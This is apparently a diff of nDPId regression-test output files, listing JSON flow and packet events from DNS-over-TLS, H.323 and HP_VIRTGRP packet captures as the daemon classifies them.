01419{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":298,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592553007037,"flow_last_seen":1592553007118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592553007118,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}}
00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":133,"flow_first_seen":1592552878549,"flow_last_seen":1592552996502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":19828,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48098,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":241,"flow_first_seen":1592553007037,"flow_last_seen":1592553079303,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":48857,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1592553079303,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48210,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}}
00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":532,"source":"googledns_android10.pcap","alias":"nDPId-test","packets-captured":532,"packets-processed":532,"total-skipped-flows":0,"total-l4-data-len":97842,"total-not-detected-flows":0,"total-guessed-flows":2,"total-detected-flows":6,"total-detection-updates":9,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":59,"global_ts_msec":1592553079303}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 532/532

8
test/results/h323-overflow.pcap.out
View File

@@ -1,9 +1,9 @@
00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"h323-overflow.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946681200000}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946681200000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":946681200000,"pkt":"IiIiIiIiIiIiIiIjCABFAAAsRr1AAIAG+9DAqAEBwKgBAnppAFA5fV1j4FJ\/s1AYQD3UwAAAAwAABA=="}
00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946681200000,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":946681200000,"pkt":"IiIiIiIiIiIiIiIjCABFAAAsRr1AAIAG+9DAqAEBwKgBAnppAFA5fV1j4FJ\/s1AYQD3UwAAAAwAABA=="}
00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":31337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"h323-overflow.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-data-len":4,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":946681200000}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 1/1

10
test/results/h323.pcap.out
View File

@@ -5,12 +5,12 @@
00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1198747079978,"flow_last_seen":1198747079978,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1198747079978,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.161","src_port":2034,"dst_port":1719,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}}
00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1198747080010,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":125,"pkt_l4_len":91,"thread_ts_msec":1198747080010,"pkt":"ABMh8GpfABj+bZZlCABFAABviRAAAIARjk0RAgChEQIAfAa3B\/IAWwaKBIAAAAYACJFKAAQ+AE8AcABlAG4ASAAzADIAMwAgAEcAYQB0AGUAawBlAGUAcABlAHIAIABvAG4AIABtAGYAbwB0AHQAZQBrAGkAbgARAgChBrc="}
00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1198747080226,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1198747080226,"pkt":"ABj+bZZlABMh8GpfCABFAACgx94AAIART04RAgB8EQIAoQfyBrcAjI1fDsAAAQYACJFKAASAAQARAgB8BrgBABECAHwH8iIArgEAPQABhA4QA0AzMzMzMzMzMzCZkD4ATwBwAGUAbgBIADMAMgAzACAARwBhAHQAZQBrAGUAZQBwAGUAcgAgAG8AbgAgAG0AZgBvAHQAdABlAGsAaQBuAK4BAD0oCwAAAQABgAGA"}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1198747081344,"flow_last_seen":1198747081344,"flow_idle_time":7440000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1198747081344,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1198747081344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1198747081344,"pkt":"ABMh8GmQABMh8GpfCABFAADByARAAIAGDzkRAgB8EQIAegvYBrgNUNrQGPo2h1AY\/\/8jrQAAAwAAmQgCAAEFBAOQkKJsCME1Mjk1NjcycAjBOTI0NjUyNn4AcwUgqAYACJFKAAQBAwCFyJpSIK4BAD0AEQIAega4AAA9\/TAAAEgzgAAFBAMCAQAAzQ2AAgcAEQIAfAa4EQAAQJH7con5EYAqBQQDAgEAAQABAAEAAQAZAXggFAARaW5mb0Bhc2Vsc2FuLmNvbW9tKBCAAQCh"}
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1198747081402,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1198747081402,"pkt":"ABMh8GpfABMh8GmQCABFAABWwtdAAIAGFNERAgB6EQIAfAa4C9gY+jaHDVDbaVAY\/2aqggAAAwAALggCgAFafgAiBSXABgAIkUoABFgIEQAkqxVydvoYEJpYABMh8GmQAoABAA=="}
00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1198747081344,"flow_last_seen":1198747081402,"flow_idle_time":7440000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1198747081402,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}}
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1198747081344,"flow_last_seen":1198747081344,"flow_idle_time":7560000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1198747081344,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1198747081344,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1198747081344,"pkt":"ABMh8GmQABMh8GpfCABFAADByARAAIAGDzkRAgB8EQIAegvYBrgNUNrQGPo2h1AY\/\/8jrQAAAwAAmQgCAAEFBAOQkKJsCME1Mjk1NjcycAjBOTI0NjUyNn4AcwUgqAYACJFKAAQBAwCFyJpSIK4BAD0AEQIAega4AAA9\/TAAAEgzgAAFBAMCAQAAzQ2AAgcAEQIAfAa4EQAAQJH7con5EYAqBQQDAgEAAQABAAEAAQAZAXggFAARaW5mb0Bhc2Vsc2FuLmNvbW9tKBCAAQCh"}
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1198747081402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"thread_ts_msec":1198747081402,"pkt":"ABMh8GpfABMh8GmQCABFAABWwtdAAIAGFNERAgB6EQIAfAa4C9gY+jaHDVDbaVAY\/2aqggAAAwAALggCgAFafgAiBSXABgAIkUoABFgIEQAkqxVydvoYEJpYABMh8GmQAoABAA=="}
00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1198747081344,"flow_last_seen":1198747081402,"flow_idle_time":7560000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1198747081402,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}}
00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1198747079978,"flow_last_seen":1198747160184,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":369,"flow_tot_l4_payload_len":1098,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1198747160184,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.161","src_port":2034,"dst_port":1719,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}}
00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1198747081344,"flow_last_seen":1198747081402,"flow_idle_time":7440000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1198747160184,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}}
00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1198747081344,"flow_last_seen":1198747081402,"flow_idle_time":7560000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1198747160184,"l3_proto":"ip4","src_ip":"17.2.0.124","dst_ip":"17.2.0.122","src_port":3032,"dst_port":1720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"H323","breed":"Acceptable","category":"VoIP"}}
00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":12,"source":"h323.pcap","alias":"nDPId-test","packets-captured":12,"packets-processed":12,"total-skipped-flows":0,"total-l4-data-len":1297,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":14,"global_ts_msec":1198747160184}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 12/12

108
test/results/hpvirtgrp.pcap.out
View File

@@ -1,66 +1,66 @@
00460{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"hpvirtgrp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1614852331255}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614852331255,"flow_last_seen":1614852331255,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614852331255,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614852331255,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614852331255,"pkt":"eJS0JASgYDjgxTWgCABFAAA85EJAAD8GMf7AqAJkoCzCQrXqFGfdahKJAAAAAKAC\/\/\/rnAAAAgQFtAQCCAoReGspAAAAAAEDAwg="}
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614852331284,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614852331284,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnteoCmmbE3WoSimASchDc7QAAAgQFrAAA"}
00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614852331288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614852331288,"pkt":"eJS0JASgYDjgxTWgCABFAAAo5ENAAD8GMhHAqAJkoCzCQrXqFGfdahKKAppmxVAQ\/\/9mswAA"}
00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614852331255,"flow_last_seen":1614852331296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614852331296,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614852331255,"flow_last_seen":1614852331255,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614852331255,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614852331255,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1614852331255,"pkt":"eJS0JASgYDjgxTWgCABFAAA85EJAAD8GMf7AqAJkoCzCQrXqFGfdahKJAAAAAKAC\/\/\/rnAAAAgQFtAQCCAoReGspAAAAAAEDAwg="}
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614852331284,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1614852331284,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGIVGgLMJCwKgCZBRnteoCmmbE3WoSimASchDc7QAAAgQFrAAA"}
00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614852331288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1614852331288,"pkt":"eJS0JASgYDjgxTWgCABFAAAo5ENAAD8GMhHAqAJkoCzCQrXqFGfdahKKAppmxVAQ\/\/9mswAA"}
00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614852331255,"flow_last_seen":1614852331296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1614852331296,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":46570,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HP_VIRTGRP","breed":"Acceptable","category":"Network"}}
00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":15,"total-skipped-flows":0,"total-l4-data-len":522,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1614861892925}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"hpvirtgrp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614861892925,"flow_last_seen":1614861892925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614861892925,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.194.66","src_port":59200,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
